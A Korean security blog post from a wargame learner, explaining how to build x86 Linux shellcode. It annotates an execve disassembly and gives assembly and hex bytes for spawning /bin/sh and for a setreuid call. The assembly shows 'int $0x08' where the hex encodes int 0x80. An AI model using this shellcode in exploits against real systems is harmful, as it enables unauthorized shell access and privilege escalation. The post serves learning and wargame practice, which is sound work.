본문 바로가기
CAT-Security/미분류

shellcode 만들기

Lazly 2012. 2. 24. 15:26

0x08048328 <main+0>: push   %ebp
0x08048329 <main+1>: mov    %esp,%ebp
0x0804832b <main+3>: sub    $0x8,%esp
0x0804832e <main+6>: and    $0xfffffff0,%esp
0x08048331 <main+9>: mov    $0x0,%eax
0x08048336 <main+14>: sub    %eax,%esp
0x08048338 <main+16>: movl   $0x8048408,0xfffffff8(%ebp)
0x0804833f <main+23>: movl   $0x0,0xfffffffc(%ebp)
0x08048346 <main+30>: sub    $0x4,%esp
0x08048349 <main+33>: push   $0x0
0x0804834b <main+35>: lea    0xfffffff8(%ebp),%eax
0x0804834e <main+38>: push   %eax
0x0804834f <main+39>: pushl  0xfffffff8(%ebp)
0x08048352 <main+42>: call   0x8048258 <execve>
0x08048357 <main+47>: add    $0x10,%esp
0x0804835a <main+50>: leave 
0x0804835b <main+51>: ret




0x08048328 <main+0>: push   %ebp
0x08048329 <main+1>: mov    %esp,%ebp
0x0804832b <main+3>: sub    $0x8,%esp
0x0804832e <main+6>: and    $0xfffffff0,%esp
0x08048331 <main+9>: mov    $0x0,%eax
0x08048336 <main+14>: sub    %eax,%esp
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ>함수 도입부
                                                                                                       스택 8bite 확장!
0x08048338 <main+16>: movl   $0x8048408,0xfffffff8(%ebp)
0x0804833f <main+23>: movl   $0x0,0xfffffffc(%ebp)
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ>/bin/sh을 스택에 넣고,
                                                                                                         0을 그 다음스택에 넣는다.
0x08048346 <main+30>: sub    $0x4,%esp
0x08048349 <main+33>: push   $0x0
0x0804834b <main+35>: lea    0xfffffff8(%ebp),%eax
0x0804834e <main+38>: push   %eax
0x0804834f <main+39>: pushl  0xfffffff8(%ebp)
0x08048352 <main+42>: call   0x8048258 <execve>
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ->execve(str[0], str, 0) 부분
                                                                                                         꺼구로 0 str str[0] 씩 들어 간다.
                                                                                                        그리고 exeve를 호출한다.
0x08048357 <main+47>: add    $0x10,%esp
0x0804835a <main+50>: leave 
0x0804835b <main+51>: ret

이걸 스택으로 그려 보면은 이런 모양이 나옵니다.

높은주소
ret
 ebp
 0(NULL)
$0x8048408(/bin/sh)
 dummy 4
0(NULL)
push eax(str)
push 0xfffffff8(str[0])
ret
ebp

낮은주소



execve함수(쉘을 띄우는 어셈블리)
.globl main

main:
          jmp go

funs:
          pop %ebx
          xor %eax, %eax
          push %eax
          push %ebx
          movl %esp, %ecx
          xor   %edx, %edx
          movl $0xb, %al
          int $0x08

go:
           call funs
           .string "/bin/sh"
\xeb\x0d\x5b\x31\xc0\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xee\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68





setreuid어셈블리
.globl main

main:
        xor %eax, %eax
        mov $0x06, %al
        mov $0x02, %ah
        mov %eax, %ebx
        mov %ebx, %ecx
        xor %eax, %eax
        mov $0x46, %al
        int $0x80
\x31\xc0\xb0\x06\xb4\x02\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80



추가적으로 0x06부분과 0x02부분을 바꿔주면서 id값을 바꿀수 있다. 으엌ㅋㅋㅋㅋㅋㅋ
jlevel0풀면서 많은거 얻어가네요 으엌ㅋㅋㅋㅋㅋ

저작자표시 비영리 변경금지

'CAT-Security > 미분류' 카테고리의 다른 글

[Hack-Me] All Roads Lead to Rome(100)  (3) 2012.02.26
argc와 argv의 이해  (2) 2012.02.25
net reflector 강좌  (0) 2012.02.24
codegate MIS 1번문제  (0) 2012.02.24
Game  (0) 2010.04.11

'CAT-Security/미분류' Related Articles

티스토리툴바